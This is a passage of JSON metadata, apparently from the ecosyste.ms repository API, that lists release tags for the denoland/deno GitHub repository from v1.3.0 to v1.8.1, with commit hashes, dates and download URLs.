s://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0"